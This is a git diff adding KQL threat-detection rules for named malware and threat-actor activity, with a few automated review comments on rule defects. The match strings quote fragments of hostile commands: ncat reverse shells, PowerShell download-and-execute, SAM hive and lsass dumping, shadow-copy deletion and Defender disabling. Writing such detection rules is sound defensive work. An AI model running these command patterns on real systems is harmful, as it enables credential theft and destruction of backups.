+| where FolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
new file mode 100644
index 00000000..17c7a2b9
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
@@ -0,0 +1,14 @@
+// Title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
+// Author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-31
+// Level: high
+// Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
+This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats
+// False Positives:
+// - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise.
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "WsusPool" and InitiatingProcessFolderPath endswith "\\w3wp.exe") or InitiatingProcessFolderPath endswith "\\wsusservice.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql b/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql
new file mode 100644
index 00000000..eab81083
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql
@@ -0,0 +1,10 @@
+// Title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the execution of the commonly used ZeroLogon PoC executable.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1210, cve.2020-1472, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Administrator" and ProcessCommandLine contains "-c") and (FolderPath endswith "\\cool.exe" or FolderPath endswith "\\zero.exe") and InitiatingProcessFolderPath endswith "\\cmd.exe") and ((ProcessCommandLine contains "taskkill" and ProcessCommandLine contains "/f" and ProcessCommandLine contains "/im") or ProcessCommandLine contains "powershell")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql b/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql
new file mode 100644
index 00000000..8207429f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql
@@ -0,0 +1,12 @@
+// Title: FakeUpdates/SocGholish Activity
+// Author: @kostastsale
+// Date: 2022-06-16
+// Level: high
+// Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessCommandLine contains "Chrome" or InitiatingProcessCommandLine contains "Edge" or InitiatingProcessCommandLine contains "Firefox" or InitiatingProcessCommandLine contains "Opera" or InitiatingProcessCommandLine contains "Brave" or InitiatingProcessCommandLine contains "Vivaldi") and (InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" and InitiatingProcessCommandLine contains ".zip" and InitiatingProcessCommandLine contains "update" and InitiatingProcessCommandLine contains ".js") and InitiatingProcessFolderPath endswith "\\wscript.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
new file mode 100644
index 00000000..9b7d3ade
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql
@@ -0,0 +1,13 @@
+// Title: File Creation Related To RAT Clients
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-12-19
+// Level: high
+// Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate software creating a file with the same name
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\" and ((FolderPath contains "\\mydata\\" or FolderPath contains "\\datalogs\\" or FolderPath contains "\\hvnc\\" or FolderPath contains "\\dcrat\\") and (FolderPath endswith "\\datalogs.conf" or FolderPath endswith "\\hvnc.conf" or FolderPath endswith "\\dcrat.conf"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql b/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql
new file mode 100644
index 00000000..ae2317ff
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql
@@ -0,0 +1,10 @@
+// Title: Fireball Archer Install
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-03
+// Level: high
+// Description: Detects Archer malware invocation via rundll32
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "InstallArcherSvc"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql b/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql
new file mode 100644
index 00000000..7e07a4b4
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql
@@ -0,0 +1,12 @@
+// Title: Goofy Guineapig Backdoor IOC
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-14
+// Level: high
+// Description: Detects malicious indicators seen used by the Goofy Guineapig malware
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath in~ ("C:\\ProgramData\\GoogleUpdate\\config.dat", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate\\tmp.bat", "C:\\ProgramData\\GoogleUpdate\\goopdate.dll")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql b/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql
new file mode 100644
index 00000000..3abe5dce
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Greenbug Espionage Group Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-20
+// Level: critical
+// Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
+// MITRE Tactic: Execution
+// Tags: attack.g0049, attack.execution, attack.t1059.001, attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith ":\\ProgramData\\adobe\\Adobe.exe" or FolderPath endswith ":\\ProgramData\\oracle\\local.exe" or FolderPath endswith "\\revshell.exe" or FolderPath endswith "\\infopagesbackup\\ncat.exe" or FolderPath endswith ":\\ProgramData\\comms\\comms.exe") or (ProcessCommandLine contains "-ExecutionPolicy Bypass -File" and ProcessCommandLine contains "\\msf.ps1") or (ProcessCommandLine contains "infopagesbackup" and ProcessCommandLine contains "\\ncat" and ProcessCommandLine contains "-e cmd.exe") or ProcessCommandLine contains "L3NlcnZlcj1" or (ProcessCommandLine contains "system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill" or ProcessCommandLine contains "-nop -w hidden -c $k=new-object" or ProcessCommandLine contains "[Net.CredentialCache]::DefaultCredentials;IEX " or ProcessCommandLine contains " -nop -w hidden -c $m=new-object net.webclient;$m" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass whoami" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass netstat -a")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql b/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql
new file mode 100644
index 00000000..892bdc57
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Griffon Malware Attack Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: critical
+// Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\local\\temp\\" and ProcessCommandLine contains "//b /e:jscript" and ProcessCommandLine contains ".txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql b/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql
new file mode 100644
index 00000000..bc79ef77
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql
@@ -0,0 +1,10 @@
+// Title: Hermetic Wiper TG Process Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1021.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\policydefinitions\\postgresql.exe" or ((ProcessCommandLine contains "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp" or ProcessCommandLine contains " 1> \\\\127.0.0.1\\ADMIN$\\__16") or (ProcessCommandLine contains "powershell -c " and ProcessCommandLine contains "\\comsvcs.dll MiniDump " and ProcessCommandLine contains "\\winupd.log full"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql b/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
new file mode 100644
index 00000000..deb455f1
--- /dev/null
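Review bot: In the Hermetic Wiper query, `ProcessCommandLine contains "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp"` looks like a report-normalised path token rather than text that occurs in a real command line, so against DeviceProcessEvents that term presumably never matches and the selection silently reduces to the other alternatives. If the indicator is the dropped file's location, matching the concrete path suffix, `ProcessCommandLine contains ":\\temp\\sys.tmp"`, keeps the intent; worth confirming against the source report before changing it, and the same token convention should be checked in any other rule converted from the same source.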
+++ b/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution
+// Author: Arda Buyukkaya (EclecticIQ)
+// Date: 2025-02-11
+// Level: high
+// Description: Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1090, attack.t1573, attack.t1071.001, attack.t1059.001, attack.s0183, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\curl.exe" and ProcessCommandLine contains ".onion" and (ProcessCommandLine contains "socks5h://" or ProcessCommandLine contains "socks5://" or ProcessCommandLine contains "socks4a://")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
new file mode 100644
index 00000000..df9d507b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql
@@ -0,0 +1,12 @@
+// Title: Kapeka Backdoor Loaded Via Rundll32.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe.
+The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where (FolderPath contains ":\\ProgramData" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "[a-zA-Z]{5,6}\\.wll" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
new file mode 100644
index 00000000..ae1da639
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql
@@ -0,0 +1,15 @@
+// Title: Katz Stealer DLL Loaded
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-05-22
+// Level: high
+// Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants.
+Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.
+The process that loads these DLLs are very likely to be malicious.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1129, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\katz_ontop.dll" or FolderPath endswith "\\AppData\\Local\\Temp\\received_dll.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql
new file mode 100644
index 00000000..1328975d
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql
@@ -0,0 +1,12 @@
+// Title: Lace Tempest Cobalt Strike Download
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring(" and ProcessCommandLine contains "/a')"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql
new file mode 100644
index 00000000..5dc1fe91
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Lace Tempest File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\leave") or FolderPath contains ":\\Program Files\\SysAidServer\\tomcat\\webapps\\user."
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql
new file mode 100644
index 00000000..6f520623
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql
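Review bot: The description of lace_tempest_file_indicators.kql, `Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7`, does not describe this query, which matches file paths under the SysAidServer Tomcat webapps directory (`usersfiles\\user.exe`, `usersfiles.war`, `leave`, `user.`); it reads as carried over from another rule, presumably in the source. A header that matches the selection would be `// Description: Detects file creation indicators in the SysAidServer Tomcat webapps directory associated with Lace Tempest exploitation of SysAid`, so an analyst triaging the alert is not pointed at PowerShell scripts.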
@@ -0,0 +1,12 @@
+// Title: Lace Tempest Malware Loader Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where SHA256 startswith "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql b/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql
new file mode 100644
index 00000000..b582bc74
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql
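Review bot: `SHA256 startswith "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D"` applies a prefix match to what is already a full 64-character hash, which reads as if the value were truncated and invites a later maintainer to shorten it. An equality operator states the intent; since KQL's `startswith` is case-insensitive, the case-insensitive `SHA256 =~ "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D"` keeps the same matching behaviour regardless of the case the column stores. If the converter emits `startswith` for every hash field, the change belongs there rather than in this one file.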
@@ -0,0 +1,12 @@
+// Title: Lazarus Group Activity
+// Author: Florian Roth (Nextron Systems), wagga
+// Date: 2020-12-23
+// Level: critical
+// Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
+// MITRE Tactic: Execution
+// Tags: attack.g0032, attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "reg.exe save hklm\\sam %temp%\\~reg_sam.save" or ProcessCommandLine contains "1q2w3e4r@#$@#$@#$" or ProcessCommandLine contains " -hp1q2w3e4 " or ProcessCommandLine contains ".dat data03 10000 -p ") or (ProcessCommandLine contains "netstat -aon | find " and ProcessCommandLine contains "ESTA" and ProcessCommandLine contains " > %temp%\\~") or (ProcessCommandLine contains ".255 10 C:\\ProgramData\\IBM\\" and ProcessCommandLine contains ".DAT") or ((ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\RECYCLER\\") and (ProcessCommandLine contains " /c " and ProcessCommandLine contains " -p 0x")) or ((ProcessCommandLine contains ".bin," or ProcessCommandLine contains ".tmp," or ProcessCommandLine contains ".dat," or ProcessCommandLine contains ".io," or ProcessCommandLine contains ".ini," or ProcessCommandLine contains ".db,") and (ProcessCommandLine contains "rundll32 " and ProcessCommandLine contains "C:\\ProgramData\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql
new file mode 100644
index 00000000..63704116
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql
@@ -0,0 +1,10 @@
+// Title: MacOS FileGrabber Infostealer
+// Author: Jason Phang Vern - Onn (Gen Digital)
+// Date: 2025-09-12
+// Level: high
+// Description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql b/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql
new file mode 100644
index 00000000..b2f62614
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql
@@ -0,0 +1,10 @@
+// Title: MERCURY APT Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-26
+// Level: high
+// Description: Detects suspicious command line patterns seen being used by MERCURY APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.g0069, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-exec bypass -w 1 -enc" and ProcessCommandLine contains "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
new file mode 100644
index 00000000..f9bb6ba8
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
@@ -0,0 +1,12 @@
+// Title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: critical
+// Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "aspera" and InitiatingProcessFolderPath contains "\\ruby") and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or (ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql
new file mode 100644
index 00000000..e62e4237
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql
@@ -0,0 +1,10 @@
+// Title: Mint Sandstorm - Log4J Wstomcat Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: high
+// Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe" and (not(FolderPath endswith "\\repadmin.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql
new file mode 100644
index 00000000..dadbfc50
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql
@@ -0,0 +1,12 @@
+// Title: Mint Sandstorm - ManageEngine Suspicious Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: critical
+// Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "\\java" and (InitiatingProcessFolderPath contains "manageengine" or InitiatingProcessFolderPath contains "ServiceDesk")) and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\ssession") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy"))) and (not((ProcessCommandLine contains "download.microsoft.com" and ProcessCommandLine contains "manageengine.com" and ProcessCommandLine contains "msiexec")))
\ No newline at end of file
